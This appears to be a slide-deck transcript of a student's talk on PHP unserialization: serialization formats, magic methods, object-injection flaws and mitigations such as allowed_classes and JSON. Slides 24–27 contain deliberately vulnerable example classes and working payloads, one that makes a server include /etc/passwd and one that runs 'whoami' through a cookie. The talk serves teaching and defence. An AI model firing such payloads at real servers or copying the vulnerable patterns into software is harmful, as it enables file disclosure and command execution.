![php > serialization();
O:4:"Test":2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}
object(Test)#1 (2) {
["name"]=>
string(6) "Ashwin"
["age"]=>
int(19)
}
O:<class name length>:"<class name>":<number of properties>:{ <properties> };](https://image.slidesharecdn.com/acloserlookintophpunserialization-190310110026/85/Closer-look-at-PHP-Unserialization-by-Ashwin-Shenoi-12-320.jpg)
![php > echo “Exploit 1”;
class Example1 {
public $file;
public function __construct( ) {
// Random PHP Code
}
public function __destruct( ) {
if ( file_exists ( $this->file ) ) {
include ( $this->file );
}
}
}
…..
// Random PHP Code
$data = unserialize($_GET[‘input’]);
// Random PHP Code
…..](https://image.slidesharecdn.com/acloserlookintophpunserialization-190310110026/85/Closer-look-at-PHP-Unserialization-by-Ashwin-Shenoi-24-320.jpg)
![php > echo “Exploit 1”;
…..
public function __destruct( ) {
if ( file_exists ( $this->file ) ) {
include ( $this->file );
}
}
…..
$data = unserialize($_GET[‘input’]);
http://example.com/?input=O:8:"Example1":1:{s:4:"file";s:11:"/etc/passwd";}](https://image.slidesharecdn.com/acloserlookintophpunserialization-190310110026/85/Closer-look-at-PHP-Unserialization-by-Ashwin-Shenoi-25-320.jpg)
![php > echo “Exploit 2”;
class Example2 {
public $cmd;
public function __construct( ) {
// Random PHP Code
}
public function __wakeup( ) {
if ( isset ( $this->cmd ) ) {
system ( $this->cmd );
}
}
}
…..
// Random PHP Code
$data = unserialize($_COOKIE[‘input’]);
// Random PHP Code
…..](https://image.slidesharecdn.com/acloserlookintophpunserialization-190310110026/85/Closer-look-at-PHP-Unserialization-by-Ashwin-Shenoi-26-320.jpg)
![php > echo “Exploit 2”;
…..
public function __wakeup( ) {
if ( isset ( $this->cmd ) ) {
system ( $this->cmd );
}
}
…..
$data = unserialize($_COOKIE[‘input’]);
GET / HTTP/1.1
Host: example.com
Cookie: input=O:8:"Example2":1:{s:3:"cmd";s:6:"whoami";}](https://image.slidesharecdn.com/acloserlookintophpunserialization-190310110026/85/Closer-look-at-PHP-Unserialization-by-Ashwin-Shenoi-27-320.jpg)
![php > echo “Mitigation”;
● PHP7 has added an additional parameter, “options”, to
the unserialize( ) function.
○ unserialize($str, [‘allowed classes’ => false]);
● Never use the unserialize( ) function on user
controllable input.
● Instead use JSON format.
○ json_encode( )
○ json_decode( )](https://image.slidesharecdn.com/acloserlookintophpunserialization-190310110026/85/Closer-look-at-PHP-Unserialization-by-Ashwin-Shenoi-30-320.jpg)
Closer look at PHP Unserialization by Ashwin Shenoi
- 1. A Closer Look Into PHP Unserialization S Ashwin Shenoi
- 2. php > system(“whoami”); ● S Ashwin Shenoi (@c3rb3ru5) ● 2nd year BTech CSE @ Amrita School of Engineering, Amritapuri ● CTF Player @teambi0s ● Web Exploitation ● Organising team @InCTF and InCTFj ● Twitter: @__c3rb3ru5__
- 3. php > echo “Agenda”; ● PHP Classes and Objects ● Serialization and unserialization ● What are magic functions ● Vulnerabilities of unserialize() function ● Exploiting unserialize() ● Mitigation
- 4. ● Programmer defined data structure which consists of local data (attributes or properties) as well as local functions. php > echo “PHP Classes”; class Test { public $name; public $age; public function __construct( ) { $this->name = "Ashwin"; $this->age = 19; } }
- 5. php > echo “PHP Objects”; ● An object is a data type which stores data and information on how to process that data. ● An Object is an individual instance of the data structure defined by a class. ● We define a class once and then make many objects that belong to it. $person = new Test( );
- 6. ● PHP Classes and Objects ● Serialization and unserialization ● What are magic functions ● Vulnerabilities of unserialize() function ● Exploiting unserialize() ● Mitigation php > echo “Agenda”;
- 7. php > echo “What is serialization”; ● Converting a complex data structure such as a class object or arrays into strings. ● Easier for transmission and storage. ● Stored representation of an object.
- 8. php > echo “What is serialization”; ● Example Scenarios: ○ Passing objects via URL Query parameters or cookies. ○ Storing object data in text or in a single database field ■ serialize( ) the object to a string ■ Store the object into the database or text ■ unserialize( ) the stored string back to a PHP Object
- 9. php > serialization(); ● Double ○ d:<value>; ○ d:12.1234; ● NULL ○ N; ● Integers ○ i:<value>; ○ i:100; ○ i:-200; ● Boolean ○ b:<value>; ○ b:1; // TRUE ○ b:0; // FALSE
- 10. php > serialization(); ● Strings ○ s:<length>:“<value>”; ○ s:6:“Ashwin”; ● Arrays ○ a:<length>:{<key>;<value>;} ○ a:2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;} ■ // array( "name" => "Ashwin" , "age" => 19 );
- 11. php > $a = 5; php > var_dump($a); int(5) php > echo serialize($a); i:5; php > $b = unserialize('i:5;'); php > echo $b; 5 php > var_dump($b); int(5) php > serialization(); php > $c = "Ashwin"; php > var_dump($c); string(6) "Ashwin" php > echo serialize($c); s:6:"Ashwin"; php > $d = unserialize('s:6:"Ashwin";'); php > echo $d; Ashwin php > var_dump($d); string(6) "Ashwin"
- 12. php > serialization(); O:4:"Test":2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;} object(Test)#1 (2) { ["name"]=> string(6) "Ashwin" ["age"]=> int(19) } O:<class name length>:"<class name>":<number of properties>:{ <properties> };
- 13. php > echo “Agenda”; ● PHP Classes and Objects ● Serialization and unserialization ● What are magic functions ● Vulnerabilities of unserialize() function ● Exploiting unserialize() ● Mitigation
- 14. php > echo “__Magic_Methods( )”; ● Reserved functions whose function names start with “__”. ● Magic methods are named after the specific action that leads to their execution. ● All magic methods MUST be declared as public. ● Automatically called, so need not be explicitly called or invoked. ● Magic methods can be called and executed after unserialization.
- 15. php > echo “__Magic_Methods( )”; __sleep( ) __wakeup( ) __toString( ) __invoke( ) __set_state( ) __clone( ) __debugInfo( ) __construct( ) __destruct( ) __call( ) __callStatic( ) __get( ) __set( ) __isset( ) __unset( )
- 16. php > echo “__Magic_Methods( )”; ● __construct( ) ○ Normally used to initialise data in variables. ○ First method called after object creation. ○ If you do not explicitly declare it, then there will be a default constructor with no parameters and empty content in the class.
- 17. php > echo “__Magic_Methods( )”; ● __destruct( ) ○ Perform some operations before destroying an object, such as closing a file, etc ○ Called as soon as there are no other references to a particular object, or in any order during the shutdown sequence. ○ Unlike the constructor the destructor cannot have any parameters.
- 18. php > echo “__Magic_Methods( )”; ● __wakeup( ) ○ Called as soon as PHP encounters a unserialize( ) function. ○ Often used to rebuild database connections, or perform other initialization operations. ○ This is kind of like the opposite of what the __sleep( ) magic function does, which is automatically called when serialize( ) function is called.
- 19. php > echo “Agenda”; ● PHP Classes and Objects ● Serialization and unserialization ● What are magic functions ● Vulnerabilities of unserialize() function ● Exploiting unserialize() ● Mitigation
- 20. So how on earth is this vulnerable?
- 21. php > echo “Vulnerability”; ● unserialize( ) function is SECURE, IF USER CANNOT INFLUENCE THE INPUT.
- 22. php > echo “Vulnerability”; ● In order to successfully exploit an unserialize bug, two conditions HAVE to be satisfied: ○ PHP Magic Method (eg. __destruct or __wakeup), that has malicious code, or can start a POP chain. ○ All classes used for the attack should be declared and imported properly by the time of unserialization, or else it has to support class autoloading.
- 23. php > echo “Agenda”; ● PHP Classes and Objects ● Serialization and unserialization ● What are magic functions ● Vulnerabilities of unserialize() function ● Exploiting unserialize() ● Mitigation
- 24. php > echo “Exploit 1”; class Example1 { public $file; public function __construct( ) { // Random PHP Code } public function __destruct( ) { if ( file_exists ( $this->file ) ) { include ( $this->file ); } } } ….. // Random PHP Code $data = unserialize($_GET[‘input’]); // Random PHP Code …..
- 25. php > echo “Exploit 1”; ….. public function __destruct( ) { if ( file_exists ( $this->file ) ) { include ( $this->file ); } } ….. $data = unserialize($_GET[‘input’]); http://example.com/?input=O:8:"Example1":1:{s:4:"file";s:11:"/etc/passwd";}
- 26. php > echo “Exploit 2”; class Example2 { public $cmd; public function __construct( ) { // Random PHP Code } public function __wakeup( ) { if ( isset ( $this->cmd ) ) { system ( $this->cmd ); } } } ….. // Random PHP Code $data = unserialize($_COOKIE[‘input’]); // Random PHP Code …..
- 27. php > echo “Exploit 2”; ….. public function __wakeup( ) { if ( isset ( $this->cmd ) ) { system ( $this->cmd ); } } ….. $data = unserialize($_COOKIE[‘input’]); GET / HTTP/1.1 Host: example.com Cookie: input=O:8:"Example2":1:{s:3:"cmd";s:6:"whoami";}
- 28. Let’s get to a demo
- 29. php > echo “Agenda”; ● PHP Classes and Objects ● Serialization and unserialization ● What are magic functions ● Vulnerabilities of unserialize() function ● Exploiting unserialize() ● Mitigation
- 30. php > echo “Mitigation”; ● PHP7 has added an additional parameter, “options”, to the unserialize( ) function. ○ unserialize($str, [‘allowed classes’ => false]); ● Never use the unserialize( ) function on user controllable input. ● Instead use JSON format. ○ json_encode( ) ○ json_decode( )
- 31. Questions ?